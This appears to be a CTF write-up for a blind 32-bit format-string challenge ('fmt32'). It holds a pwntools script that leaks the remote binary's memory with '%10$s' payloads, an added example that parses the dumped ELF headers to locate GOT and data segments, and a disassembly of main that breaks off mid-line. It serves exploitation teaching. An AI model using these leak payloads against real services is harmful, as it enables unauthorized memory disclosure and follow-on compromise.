The challenge author seems to like blind pwn: 3 of the 5 pwn challenges were blind. For lack of time I didn't get to look at rop64 (I'm too weak).
1.fmt32
Only an ip & port were given, no attachment, so presumably blind pwn. Judging from the challenge name, guess there is a format string vulnerability; trying it showed that the program runs in a loop (it is a repeater, after all), so the format string bug can be triggered on every iteration. The first idea is therefore to dump memory and analyse it offline: if the 32-bit binary is built without PIE, its ELF header is mapped at 0x8048000, so the dump can start there and walk forward with %s reads (one caveat: %s stops at the first NUL byte, so an empty reply means the byte at that address is 0 and the cursor has to be advanced by hand).
from pwn import *
import sys

# Only ip:port were given for the challenge, so take them from the command line.
io = remote(sys.argv[1], int(sys.argv[2]))

def leak(addr):
    # '%10$s' dereferences the 10th printf argument, which for this binary is
    # where the p32(addr) appended below lands on the stack; '.TMP' marks the
    # end of the leaked string so it can be cut out of the echoed reply.
    payload = b"%10$s.TMP" + p32(addr)
    io.sendline(payload)
    print("leaking:", hex(addr))
    io.recvuntil(b'Repeater:')
    resp = io.recvuntil(b".TMP")
    ret = resp[:-4]
    print(ret, len(ret))
    io.recvrepeat(0.2)  # drain whatever else this round printed
    return ret

start_addr = 0x8048000
text_seg = b''
try:
    while True:
        ret = leak(start_addr)
        text_seg += ret
        start_addr += len(ret)
        if start_addr >= 0x8048b00:
            break
        if len(ret) == 0:
            # %s printed nothing: the byte at start_addr is NUL, record it and step over it
            start_addr += 1
            text_seg += b'\x00'
except Exception as e:
    print(e)
print('[+]', len(text_seg))
with open('dump_bin', 'wb') as f:
    f.write(text_seg)
The code segment ends at roughly 0x8048b00. After the dump finishes, load it into IDA (32-bit, base address 0x8048000), locate the code segment; the function below should be main. Which library function each sub_ really is can only be guessed from what the remote server prints and from the control flow: the three sub_8048450 calls each take a global pointer plus 0, which looks like the usual setbuf(stdin/stdout/stderr, NULL) prologue; sub_8048490 is called with a string constant, so most likely puts; and the mov eax, large gs:14h / mov [ebp-0Ch], eax pair at the top means the binary has a stack canary.
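The same dump loop run against a constructed memory image instead of the remote service, followed by the step that naturally comes next once the bytes are on disk: because the dump starts at 0x8048000 it begins with the ELF header, so the program headers can be parsed straight out of it to learn where the writable data segment and .dynamic live (the addresses a later GOT overwrite needs). This is added example code, not part of the original writeup; the ELF image, every address in it (entry 0x08048400, data at 0x08049f0c, .dynamic at 0x08049f14) and the fake_leak() helper are constructed for the example and say nothing about the real fmt32 binary.

```python
import struct

# Load address of a non-PIE 32-bit ELF, the same assumption the dump script makes.
BASE = 0x08048000
PT_LOAD, PT_DYNAMIC = 1, 2


def build_sample_image():
    """Constructed stand-in for the first few hundred bytes of a non-PIE x86
    binary: an ELF32 header, three program headers and a couple of strings.
    Every value here is made up for the example; it is not the fmt32 binary."""
    phoff, phentsize, phnum = 52, 32, 3
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, little endian
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2,                     # e_type = ET_EXEC (non-PIE, fixed load address)
        3,                     # e_machine = EM_386
        1,                     # e_version
        0x08048400,            # e_entry (made up)
        phoff, 0, 0,           # e_phoff, e_shoff, e_flags
        52, phentsize, phnum,  # e_ehsize, e_phentsize, e_phnum
        40, 0, 0,              # e_shentsize, e_shnum, e_shstrndx (no section headers in the dump)
    )

    def phdr(p_type, off, vaddr, size, flags, align):
        return struct.pack("<8I", p_type, off, vaddr, vaddr, size, size, flags, align)

    phdrs = (
        phdr(PT_LOAD, 0x000, BASE, 0xB00, 5, 0x1000)             # R+X: text
        + phdr(PT_LOAD, 0xF0C, 0x08049F0C, 0x120, 6, 0x1000)     # R+W: data / GOT
        + phdr(PT_DYNAMIC, 0xF14, 0x08049F14, 0xE8, 6, 4)        # .dynamic
    )
    # Strings with embedded NULs, to exercise the "%s stops at NUL" handling.
    tail = b"Repeater:\x00" + b"\x00" * 3 + b"%s\x00" + b"\x7f"
    return ehdr + phdrs + tail


SAMPLE_IMAGE = build_sample_image()


def fake_leak(addr):
    """Simulates what '%N$s' prints when the N-th argument points at addr:
    the bytes from addr up to (not including) the first NUL."""
    off = addr - BASE
    if not 0 <= off < len(SAMPLE_IMAGE):
        raise ValueError("address outside the constructed image")
    end = SAMPLE_IMAGE.find(b"\x00", off)
    return SAMPLE_IMAGE[off:] if end < 0 else SAMPLE_IMAGE[off:end]


def dump_range(leak, start, end):
    """The dump loop from the writeup: walk [start, end) with %s reads,
    inserting a 0 byte and stepping by one whenever %s prints nothing."""
    out = bytearray()
    addr = start
    while addr < end:
        chunk = leak(addr)
        if chunk:
            out += chunk
            addr += len(chunk)
        else:
            out.append(0)  # empty reply means the byte at addr is NUL
            addr += 1
    return bytes(out[: end - start])  # the last %s may run past end


def parse_elf32_phdrs(image):
    """Read the ELF32 header at the start of the dump and return (e_entry, phdrs)."""
    if image[:4] != b"\x7fELF" or image[4] != 1:
        raise ValueError("not an ELF32 image")
    hdr = struct.unpack_from("<HHIIIIIHHHHHH", image, 16)
    e_entry, e_phoff, e_phentsize, e_phnum = hdr[3], hdr[4], hdr[8], hdr[9]
    names = ("p_type", "p_offset", "p_vaddr", "p_paddr",
             "p_filesz", "p_memsz", "p_flags", "p_align")
    phdrs = []
    for i in range(e_phnum):
        fields = struct.unpack_from("<8I", image, e_phoff + i * e_phentsize)
        phdrs.append(dict(zip(names, fields)))
    return e_entry, phdrs


def writable_segments(phdrs):
    """(vaddr, memsz) of every PT_LOAD segment with the write bit set: where the GOT/data live."""
    return [(p["p_vaddr"], p["p_memsz"]) for p in phdrs
            if p["p_type"] == PT_LOAD and p["p_flags"] & 2]


if __name__ == "__main__":
    img = dump_range(fake_leak, BASE, BASE + len(SAMPLE_IMAGE))
    entry, phdrs = parse_elf32_phdrs(img)
    print("entry", hex(entry))
    for p in phdrs:
        print("type %d vaddr %#x memsz %#x flags %d" % (p["p_type"], p["p_vaddr"], p["p_memsz"], p["p_flags"]))
    print("writable:", [(hex(a), hex(s)) for a, s in writable_segments(phdrs)])
```

Against the real service, leak() from the script above plays the role of fake_leak(); the only difference that matters is that some addresses cannot be sent as written, for example one whose encoding contains 0x0a when the input routine stops at a newline, so a real dumper has to skip or re-route those few addresses instead of trusting every reply.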
seg000:08048605 push ebp
seg000:08048606 mov ebp, esp
seg000:08048608 push ecx
seg000:08048609 sub esp, 244h
seg000:0804860F mov eax, large gs:14h
seg000:08048615 mov [ebp-0Ch], eax
seg000:08048618 xor eax, eax
seg000:0804861A mov eax, ds:804A064h
seg000:0804861F sub esp, 8
seg000:08048622 push 0
seg000:08048624 push eax
seg000:08048625 call sub_8048450
seg000:0804862A add esp, 10h
seg000:0804862D mov eax, ds:804A060h
seg000:08048632 sub esp, 8
seg000:08048635 push 0
seg000:08048637 push eax
seg000:08048638 call sub_8048450
seg000:0804863D add esp, 10h
seg000:08048640 mov eax, ds:804A040h
seg000:08048645 sub esp, 8
seg000:08048648 push 0
seg000:0804864A push eax
seg000:0804864B call sub_8048450
seg000:08048650 add esp, 10h
seg000:08048653 sub esp, 0Ch
seg000:08048656 push 80487E0h
seg000:0804865B call sub_8048490
seg000:08048660 add esp, 10h
seg000:08048663 sub esp, 0Ch
seg000:08048666 push 804885Ch
seg000:0804866B call sub_8048490
seg000:08048670 add esp, 10h
seg000:08048673 mov dword ptr [ebp-240h], 0
seg000:0804867D
seg000:0804867D loc_804867D: ; loop
seg000:0804867D sub esp, 0Ch
seg000:08048680 push 3
seg000